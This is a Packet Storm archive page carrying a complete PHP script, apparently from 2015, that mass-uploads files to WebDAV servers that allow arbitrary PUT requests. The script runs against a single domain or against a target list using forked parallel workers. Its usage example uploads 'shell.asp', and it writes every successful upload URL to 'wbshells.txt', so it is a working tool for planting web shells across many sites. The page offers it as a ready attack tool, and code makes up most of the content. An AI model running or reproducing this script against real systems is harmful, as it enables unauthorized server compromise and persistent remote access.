what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebDAV Uploading Script

WebDAV Uploading Script
Posted Apr 10, 2015
Authored by AdeRoot

Simple PHP script that explores WebDAV vulnerable sites that allow arbitrary uploads.

tags | tool, arbitrary, scanner, php, file upload
systems | unix
SHA-256 | 82096e8ddc00f8baec5d02ce1a0576b3e0253c168398a7b80b0b02473a331d36

WebDAV Uploading Script

Change Mirror Download
<?php
/*
Author: @AdeRoot
Simple Script WebDav Exploit
Greetz: TheShow, Mathew, leaf
Since: 2015
OS Linux
*/

echo "Author: @AdeRoot\n\n";
echo " // WebDav Exploit\n\n";
if($argc == 1) {
echo "Help parameter: | -h--help\n";
exit(1);
}

function help() {
echo "Options[+]:\n\n";
echo "Dominio: | -d--dominio\n";
echo "Lista: | -l--lista\n";
echo "Thread: | -t--thread\n";
echo "File: | -f--file\n";
echo "Create: | -c--create\n\n";
echo "Single:\n\n";
echo "Usage: php webdav.php -d xxx -f xxx -c xxx\n";
echo "Example: php webdav.php -d www.example.com -f /path/shell.asp -c shell.asp\n\n";
echo "Lista:\n\n";
echo "Usage: php webdav.php -l xxx -t xxx -f xxx -c xxx\n";
echo "Example: php webdav.php -l lista.txt -t 10 -f /path/shell.asp -c shell.asp\n\n";
}

error_reporting(0);
set_time_limit(0);

$opts = getopt("hd:f:l:t:c:");
foreach(array_keys($opts) as $opt) switch($opt) {
case "h":
help();
break;

case "d":
$site = $opts["d"];
$file = $opts["f"];
$create = $opts["c"];
post($site);
break;

case "l":
$site = array_filter(explode("\n",file_get_contents($opts["l"])));
$thread = $opts["t"];
$file = $opts["f"];
$create = $opts["c"];
thread($site,$thread,$file,$create);
break;
}

function thread($site,$thread,$file,$create) {
$out = 0;
$thr = $thread;
$ini = 0;
$fin = $thr - 1;
while(1){
$childs = array();
for ($count = $ini; $count <= $fin; $count++){
if(empty($site[$count])){
$out = 1;
continue;
}
$pid = pcntl_fork();
if ( $pid == -1 ) {
echo "Fork error\n";
exit(1);
} else if ($pid) {
array_push($childs, $pid);
} else {
post($site[$count]);
exit(0);
}
}
foreach($childs as $key => $pid){
pcntl_waitpid($pid, $status);
}
if($out == 1){
exit(0);
}
$ini = $fin + 1;
$fin = $fin + $thr;
}
}

function post($site) {
global $file, $create;
$filesize = filesize($file);
$fp = fopen($file, "r");
if(preg_match("@http://@", $site)) {
$site = $site;
} else {
$site = "http://".$site;
}
$site = $site."/".$create;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $site);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
curl_setopt($ch, CURLOPT_PUT, true);
curl_setopt($ch, CURLOPT_INFILE, $fp);
curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
$exec = curl_exec($ch);
echo $site."=>";
$result = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
fclose($fp);
if($result == 200 || $result == 201) {
echo "Created Successfully\n\n";
file_put_contents("wbshells.txt", $site."\n", FILE_APPEND);
} else {
echo "Failed\n\n";
}
}
if(isset($opts["f"]) and ($opts["c"])) {
echo "End!\n\n";
} else if (!isset($opts["h"])){
echo "Option invalid or missing set more options\n\n";
}
?>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close